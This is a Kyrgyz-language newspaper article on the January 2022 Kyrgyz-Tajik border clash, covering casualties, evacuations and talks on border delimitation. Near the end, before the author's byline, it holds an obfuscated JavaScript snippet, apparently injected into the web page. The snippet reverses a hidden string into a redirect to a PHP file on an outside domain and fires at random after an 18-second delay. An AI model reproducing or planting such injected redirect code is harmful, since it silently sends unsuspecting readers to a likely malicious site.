"Эркин-Тоо"

Чек ара маселеси чечилеби?

Кыргыз-тажик чек арасындагы көйгөй кечээ гана чыга калган жок. Бул ондогон жылдан бери чечилбей келе жаткан маселе. Тилекке каршы, акыркы жылдары абал барган сайын курчуп жатат. Былтыр куралдуу жаңжалга чейин жетсе, 27-январь күнү кечке маал дагы чыр чыгып, коомчулукту кабатырга салды. Төрт-Көчө аймагында тажик тургундар жолду бууганга аракет кылып, сүйлөшүүлөрдөн кийин абал жайгарылган. Бирок, кайрадан тажик тараптан Чыр-Дөбөдө ок атылганын Кыргызстандын Чек ара кызматы билдирген. Кыргызстан бул окуяны тажик чек арачыларынын атайын жасаган чагымы десе, тажик тарап болсо бизди күнөөлөшүүдө.

Тилекке жараша бизде жоготуулар болгон жок, 11 аскер кызматкери жаракат алып, ооруканага жаткырылган. Алардын абалы орточо оор экендигин маалым болду. Көк-Таш айылынын тургуну Зиямидин Тагаевдин сарайы талкаланып мал жандыктары күйүп кеткен. Өз убагында эвакуацияланган жарандардын баары керектүү нерселер менен камсыздандырылып, медицина кызматкерлеринин көзөмөлүндө болушкан. Ал эми Тажикстандын «Ховар» маалымат агенттиги жаңжалда эки адам мерт болуп, 10 адам жаракат алганын, алардын алтоо аскер кызматкерлери экендигин жазып чыкты.

Президент Садыр Жапаров дароо чек арада болуп жаткан окуялар биринчи мүнөттөрдөн баштап, толук көзөмөлүндө экендигин, баары тынчтык жана сүйлөшүүлөр жолу менен чечилээрин айтып, элди кабатырланбоого чакырды. Тажикстандын Президенти Э. Рахмондун ак же көк деп үн катпай олтурушун айрым эксперттер тажик тараптан бул жаңжалдын атайын уюштурулгандыгын, кырдаалды курчутуу алдындагы сыноо катары баалашты. Анткени, буга чыр-чатак учурунда тажик тараптын миномет колдонгондугу олуттуу себеп болууда. Ар бир мамлекет чек араларын кайтарууда өз мүмкүнчүлүктөрүнө жараша куралдандырышат. Бирок, чыр-чатак курчуп кетпеши үчүн жеңил ок атуучу куралдар гана берилет. Минометтун колдонулушу олуттуу конфликтке карата даярдык көргөндөрүн айгинелеп турат. Мындай пикирин кайсыл бир маалымат сайтына айткан Борбордук Азия боюнча эксперт Андрей Грозин Кытай менен Индиянын чек араларындагы өз ара мамилелерин мисал келтирген. “Кытай менен индустардын чек арасында бири-бирин таяктар менен же таш менен ургулашат. Бирок, миномет менен эмес. Бул эки өлкөнүн чет арачыларын керектүү куралдар менен жабдууга каражаты жоктугунан эмес. Алар бүт нерсени берүүгө мүмкүнчүлүктөрү бар, бирок чыр-чатакты ырбатпоо үчүн аны кылышпайт”, -дейт.

Чек арадагы абал бир нукка түкөнгө чейин Баткенде болоорун билдирген Улуттук коопсуздук боюнча мамлекеттик комитетинин төрагасы Камчыбек Ташиев 28-январда тажик тараптан Раджаббой Ахмадзода баштаган делегация менен сүйлөшүүлөрдү жүргүзгөн.

Жолугушууда чек араларды делимитациялоону жана демаркациялоону тездетүү маселеси көтөрүлгөн. Ошондой эле, атышуулардын себептери жана келтирилген чыгым боюнча айыптоолор айтылган. Кыргыз тарап чыр-чатактын келип чыгуу себептерин аныктоо үчүн эки тараптуу комиссия түзүүнү, аскерлерди чек ара сызыктарынан тышкары алып чыгууну, чек араларда коомдук тартипти сактаган чек арачылар менен милиция кызматкерлерин гана калтырууну сунуштаган.

Баткен облусунун Достук айылында 29-январда кыргыз жана тажик мамлекеттеринин Улуттук коопсуздук боюнча мамлекеттик комитетинин  төрагалары Камчыбек Ташиев менен Саймумин Ятимов жолугушуу өткөрүшкөн. Жолугушууда эки негизги маселе документтерге кол коюсуз, кол алышуу менен макулдашылгандыгын айткан УКМКнын төрагасы Камчыбек Ташиев: “Эки ай мурунун токтоп калган чек араларды делимитациялоону жана демаркациялоону тез арада кайрадан баштоону сүйлөштүк. Анткени, иш Кулунду, Максат айылдарына келгенде токтоп калган. Эгерде жумушчу топтор арасында талаш маселе жарала турган болсо, экөөбүз кайрадан жолугуп карай турган болдук. Мындан ары да 2021-жылы 1-майда кабыл алынган протоколдун негизинде иш алып бармай болдук. Ачыгын айтканда Ворух айылына кеткен жолдун статусун аныктоо менен ага карата чараларды көрүшүбүз зарыл болуп турат. Экинчи маселе, мамлекеттер аралык чек аралар чечилмейин мындай чыр-чатактар бүтпөй тургандыгын белгиледик. Ошондуктан, чек араларды делмитациялоону жана демаркациялоону тезирээк колго алып, бир чечимге келүүнү макулдаштык”,- деди.

Учурда  жарандык коргонуу комиссиясы чек ара окуяларында зыянга учураган аймактарда келтирилген чыгымдарды эсептөөдө. Убактылуу жайгаштыруу жайларында турган жарандар өз үйлөрүнө кайтышты.

УКМКнын төрагасы Камчыбек Ташиев Ак-Татыр аймагынын тургундары менен да жолугушту. Анда Президент Садыр Жапаров ар дайым чек ара маселесин чечүүдө болгон шарттарды түзүү менен аракетин көрүп жаткандыгын белгиледи. “Тажик тарап Ворухка кеткен жолду бергиле деп жатышат. 2021-жылдын 1-майында макулдашылган протоколдо Ворухка жолду капчыгай аркылуу берели, бирок ал жолду биз курабыз дегенбиз. Президентибиз да жол курууга каражатыбыз бар экендигин айткан. Эми жол берели, бирок чек ара боюнча бир пикирге келели дедик. Эгер кайсыл бир аймакта маселе чыкса эки мамлекеттин эли жана жетекчилери менен сүйлөшүп, орток чечимди кабыл алабыз. Эч качан чек ара маселелсинде бир жактуу чечим кабыл алынбайт”,- деди К. Ташиев. Ошондой эле чек ара жаңжалын иликтөөчү биргелешкен комиссия түзүлгөнүн, чек арага эки тараптан тең чогулган аскерлер кайтарылганын айтты. Кыргызстандын куралдуу күчтөрүн жана чек ара кызматын бекемдөө максатында февраль айында дагы аскердик техникалар алынарын айтып: «Бир жыл ичинде көп маселени чечип алдык. Эл-журтту коргоп калууга мүмкүнчүлүгүбүз жетет. Келген аскер техникаларынын баарын Баткенге беребиз. Мамлекет алардын баарын өз күчү менен, өз акчасына алып жатат» ,- деди.

Баткен облустук ички иштер башкармалыгынын өздүк курамы коомдук тартипти жана коопсуздукту камсыздоо максатында түзүлгөн кырдаалга карата ыкчам чараларды көрүү боюнча күчөтүлгөн тартипте кызмат өтөөнү улантууда.

Кыргызстан ар дайым чек ара маселесинде эки тараптуу келишимдерди так аткарууда өз позициясында бекем туруп келе жатат. Дипломатиялык саясий жол менен тынч чечилишин керек деген туруктуу көз карашта. Бирок, тажик тарап сунуштарды кабыл алган менен маал-маалы менен жаңжал чыгарып келет. Болгондо да курал менен басым көрсөтүүсү басаңдабай, кооптуу жагдайга кептөөдө. Канткен менен келечекте эки өлкө толук мунасага жетишип, чек арада жайгашкан жердештерибиз бакубат жашоо кечиришет деген илгери үмүт менен туралы.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/01_02.pdf»>2022-жылдын 1-февралы
Жылдыз  ДЫЙКАНОВА

Please wait while flipbook is loading. For more related info, FAQs and issues please refer to DearFlip WordPress Flipbook Plugin Help documentation.

Пример HTML-страницы
error: Content is protected !!